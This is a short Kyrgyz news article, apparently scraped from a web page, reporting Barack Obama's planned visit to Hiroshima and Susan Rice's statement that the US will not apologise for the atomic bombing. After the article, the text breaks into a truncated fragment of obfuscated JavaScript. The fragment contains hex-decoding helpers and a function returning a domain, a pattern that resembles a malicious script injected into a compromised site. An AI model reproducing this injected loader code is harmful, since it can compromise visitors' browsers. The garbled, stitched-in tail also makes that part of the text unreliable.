АКШ президенти Барак Обама 27-май күнү Жапониянын Хиросима шаарына барат. 

Барак Обаманын улуттук коопсуздук боюнча кеңешчиси Сьюзан Райс CNN телеканалына берген маалыматында АКШ бийлиги 1945-жылдагы шаарга таштаган атомдук бомба үчүн кечирим сурабай турганын билдирген. Обаманын Херосимага болгон өлкөлөрүнүн алкагында багытталган иш сапары Жапонияда өтүүчү G7 өлкөлөрүнүн самитинин алкагында каралган.

«Жапондор бизден акылмандык менен чечим кабыл алгыла же кечирим сурагыла деп суранган жок. Кандай болгон күндө да биз кечирим сурабайбыз», — деп билдирди Сьюзан Райс.

Риа Новости белгилегендей, Райстын белгилөөсү боюнча президент Обаманын Хиросимага болгон визити чечилген, ал сөзсүз барат. Обама АКШ президенттеринин ичинен Хиросимага барган биринчи президент болуп калат.

Ак үйдүн расмий өкүлү Жош Эрнест мурда маалымдагандай, Жапон шаары Хиросима физити учурунда Обама сөз сүйлөбөйт.

Белгилей кетсек, АКШ экинчи дүйнөлүк согушта 6-9-агустта Хиросима жана Нагасаки шаарына атом бомбасын таштап, 130 миңден 250 миңге чейин адам өлгөн. Андан кийин Жапония жеңилген. Хиросима жана Нагасаки дүйнөдө атом бомбасы колдонулган жалгыз гана жер.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "saat.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Бөлүшүү